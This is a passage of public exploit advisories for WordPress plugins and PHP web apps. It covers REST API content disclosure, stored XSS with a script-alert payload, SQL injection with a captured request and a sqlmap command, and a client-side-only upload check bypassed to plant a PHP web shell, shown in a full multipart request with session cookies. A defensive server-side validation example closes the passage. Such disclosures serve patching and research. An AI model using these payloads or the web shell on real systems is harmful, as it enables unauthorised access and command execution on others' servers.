        exit(0)


if __name__ == '__main__':
    ImportObject = Exploit()
    ImportObject.main(ImportObject, argv[1:])
-
Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure
# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure
# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
# Authors blog: https://www.redtimmy.com
# Vendor Homepage: https://wpcoursesplugin.com/
# Version Vulnerable: < 2.0.29
# CVE: (requested but not assigned yet)

WP Courses plugin < 2.0.29 does not protect the courses, which can be accessed by unauthenticated users through the REST API (/wp-json/) endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}). This could result in attackers accessing paid content without authorization.

Full story here: https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
-
Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/19
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A

Vulnerable Pages:

http://localhost/loan/index.php?page=loans
http://localhost/loan/index.php?page=payments
http://localhost/loan/index.php?page=borrowers
http://localhost/loan/index.php?page=loan_type

Proof of Concept:

1 - Go to the vulnerable pages and use the edit button (on the right, in the action column).
2 - Fill in the fields with the "<script>alert(1)</script>" payload.
-
Visitor Management System in PHP 1.0 - SQL Injection (Authenticated)
# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: CVE-2020-25760

# Description

The file front.php does not perform input validation on the 'rid' parameter. An attacker can append SQL queries to the input to extract sensitive information from the database.

Note: This exploit can work pre-authentication as well, but you need to change the 302 response to 200 using an intercept tool. It should be pretty straightforward, so I have not shown how.

# POC

1) Navigate to the login page
   Example: http://192.168.1.72/visitor_management/index.php
2) Enter 'username' and 'password'
3) On the homepage, click on any visitor name and intercept the request
4) Save the request to a file. Example: visitor_management_sqli.req

GET /visitor_management/front.php?rid=373568 HTTP/1.1
Host: 192.168.1.72
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.72/visitor_management/front.php
Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
Upgrade-Insecure-Requests: 1

5) Run SQLmap on the file:

sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
-
WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
# Date: 2020-10-20
# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
# Vendor Homepage: https://www.heliossolutions.co/
# Tested on: Linux Apache / Wordpress 5.5.1
# Version: 2.1

.:: Description ::.

An authenticated user can bypass the plugin's uploader and upload an arbitrary file, because the extension of the uploaded file is only checked on the client side.

.:: Vulnerable File ::.

/wp-admin/admin.php?page=hs-brand-logo-slider.php

.:: Vulnerable Code ::.

Content-Disposition: form-data; name="logoupload"; filename="a.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>

.:: Proof Of Concept (PoC) ::.

Step 1 - Log in to your account, select hs-brand-logo-slider from the menu and upload
Step 2 - Stop the upload request with Burp Suite
Step 3 - Rename the file, for example a.jpg to a.php
Step 4 - Your shell has been uploaded; the file path is shown in the table

.:: Sample Request ::.

POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
Host: 172.16.1.17:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
Content-Length: 81765
Origin: http://172.16.1.17:81
Connection: close
Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
Upgrade-Insecure-Requests: 1

-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="brandname"

aaa
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logourl"

http://aa.com
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="sortorder"

1
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="submit_data"

Submit
-----------------------------407602771734524910834293111227--
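The server-side check that this entry's plugin lacks, added here as an example (it is not the plugin's or the author's code): the type is decided from the uploaded bytes, so the filename and Content-Type rewritten in the request above carry no weight. The logoupload field name comes from the request; the upload directory and the handler wiring are assumptions.

```php
<?php
// Added example, not the plugin's code: validate an uploaded logo on the
// server from its content, because filename="a.php" and
// Content-Type: image/jpeg in the multipart request are chosen by the client.
declare(strict_types=1);

// Image types accepted for a logo, keyed by the sniffed MIME type and
// mapped to the extension the server will assign.
const ALLOWED_LOGO_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and store it under a server-chosen name.
 * Returns the stored file name; throws on anything that is not a real image.
 * $uploadDir is assumed to be a directory outside the web root (hypothetical).
 */
function store_logo_upload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded via HTTP POST');
    }

    // 1. Type from content, not from the client-supplied name or header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_LOGO_TYPES[$mime])) {
        throw new RuntimeException("rejected content type: $mime");
    }

    // 2. The file must actually decode as that image type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        throw new RuntimeException('content does not parse as an image');
    }

    // 3. Never reuse the client filename: a random name with a server-chosen
    //    extension also removes double extensions and path separators.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_LOGO_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Hypothetical call from the plugin's admin handler (field name from the request above):
// $stored = store_logo_upload($_FILES['logoupload'], '/var/app/logo-uploads');
```

Serving the upload directory with PHP execution disabled is the second layer: a file that slips past the check still cannot run as a script.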